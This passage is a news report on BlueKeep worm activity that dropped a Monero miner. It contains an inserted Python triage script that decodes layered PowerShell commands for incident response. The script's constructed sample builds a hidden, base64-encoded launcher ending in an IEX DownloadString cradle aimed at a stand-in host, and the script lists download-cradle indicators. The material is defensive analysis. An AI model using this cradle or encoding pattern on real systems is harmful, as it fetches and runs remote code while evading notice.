Evidence of BlueKeep's exploitation in the wild came by way of Kevin Beaumont, a security researcher who noticed multiple honeypots in his EternalPot RDP network crashing and rebooting. This struck him as unusual because it was the first time it had happened in nearly a year and a half.
It looks like a #BlueKeep worm has finally arrived! Kevin kindly sent me a crash dump and after some investigation I found BlueKeep artifacts in memory and shellcode to drop a Monero Miner. https://t.co/7G88YAW5lr
— MalwareTech (@MalwareTechBlog) November 2, 2019
At first, Beaumont said there was no evidence that the crashing and rebooting was related to an RDP exploit. However, he sent the crash dump over to MalwareTech, who dug through it and concluded that "the BlueKeep worm has finally arrived!"
The investigation uncovered "BlueKeep artifacts in memory and shellcode to drop a Monero miner." The shellcode appears to run an encoded PowerShell command that makes the infected system download a second PowerShell script, which is also encoded. The final payload is the one that looks like a cryptocurrency miner (at the time of writing, 25 antivirus engines on VirusTotal detected it as such).
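The two-stage chain described above (an encoded PowerShell command that pulls a second, also encoded, script) is the part a responder has to unpick by hand. The script below is an added example and is not code from the original article or from the researchers it quotes: it peels PowerShell's -EncodedCommand layer (base64 of UTF-16LE text), keeps peeling any [Convert]::FromBase64String('...') literal found in the decoded text, and reports download-cradle indicators in each layer. The sample command line, its nested stages and the example.invalid URL are constructed for the example; they are not the payload recovered from the honeypot crash dump.

```python
"""Peel nested PowerShell encoding layers from a command line for triage.

Added example, not code from the article or from the researchers it quotes.
The sample command line at the bottom is constructed for illustration.
"""
import base64
import re

# PowerShell accepts abbreviated switch names; -e, -ec and -enc are the
# short forms of -EncodedCommand most often seen in the wild.
ENCODED_SWITCH_RE = re.compile(
    r"(?i)(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})"
)
# A base64 literal passed to [Convert]::FromBase64String(...) inside a script.
FROM_B64_RE = re.compile(
    r"(?i)FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)"
)
# Strings that mark a download cradle, an in-memory loader or a hidden window.
INDICATORS = (
    "IEX", "Invoke-Expression", "DownloadString", "DownloadFile",
    "Net.WebClient", "Invoke-WebRequest", "FromBase64String",
    "-nop", "-w hidden",
)


def encode_command(script: str) -> str:
    """Produce the -EncodedCommand form PowerShell expects: base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def _bytes_to_text(raw: bytes) -> str:
    """Guess the text encoding of a FromBase64String payload.

    UTF-16LE text made of ASCII characters has a NUL in every odd byte;
    anything else is treated as UTF-8.
    """
    if len(raw) >= 2 and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        return raw.decode("utf-16-le")
    return raw.decode("utf-8", errors="replace")


def find_indicators(text: str) -> list:
    """Return the INDICATORS present in text as whole tokens, case-insensitively."""
    found = []
    for ind in INDICATORS:
        if re.search(r"(?i)(?<![\w-])" + re.escape(ind) + r"(?!\w)", text):
            found.append(ind)
    return found


def peel_layers(command_line: str, max_depth: int = 8) -> list:
    """Return one dict per decoded layer: {"depth", "text", "indicators"}.

    Layer 0 is the command line itself; each further layer is the decoded
    content of an encoded blob found in an earlier layer. max_depth bounds
    the work so a self-referential or absurdly nested sample cannot loop.
    """
    layers = []
    pending = [(0, command_line)]
    while pending and len(layers) < max_depth:
        depth, text = pending.pop(0)
        layers.append({"depth": depth, "text": text,
                       "indicators": find_indicators(text)})
        for m in ENCODED_SWITCH_RE.finditer(text):
            try:  # -EncodedCommand is always UTF-16LE, so decode it strictly.
                raw = base64.b64decode(m.group(1), validate=True)
                pending.append((depth + 1, raw.decode("utf-16-le")))
            except ValueError:  # binascii.Error and UnicodeDecodeError
                continue
        for m in FROM_B64_RE.finditer(text):
            try:
                raw = base64.b64decode(m.group(1), validate=True)
                pending.append((depth + 1, _bytes_to_text(raw)))
            except ValueError:
                continue
    return layers


# Constructed sample (not the real payload): a hidden, encoded launcher that
# unwraps a second base64 blob and evaluates a download cradle from it.
STAGE3 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/miner.ps1')"
STAGE2 = ("$s=[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('"
          + encode_command(STAGE3) + "'));IEX $s")
SAMPLE_COMMAND_LINE = "powershell.exe -nop -w hidden -enc " + encode_command(STAGE2)

if __name__ == "__main__":
    for layer in peel_layers(SAMPLE_COMMAND_LINE):
        print(f"[layer {layer['depth']}] indicators={layer['indicators']}")
        print("  " + layer["text"][:120])
```

Run against a suspicious process command line from EDR or Sysmon event logs, each decoded layer is printed with the cradle indicators it contains, which is usually enough to tell a miner dropper from an administrator's script without executing anything. The encoding guess in _bytes_to_text is a heuristic; when a script names the encoding explicitly (Unicode versus ASCII/UTF8 in GetString), trust the script over the guess.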
BlueKeep (CVE-2019-0708) is particularly worrisome because it is wormable: an exploit can reach a vulnerable RDP host over the network with no user interaction, so malware that carries it can spread from machine to machine quickly. The crashes Beaumont saw are themselves a useful tell, since a failed exploit attempt against this bug typically blue-screens the target, and unexplained reboots on RDP-exposed hosts deserve a look at the crash dump. Microsoft issued a patch in May 2019, and businesses are strongly advised to make sure their systems are updated.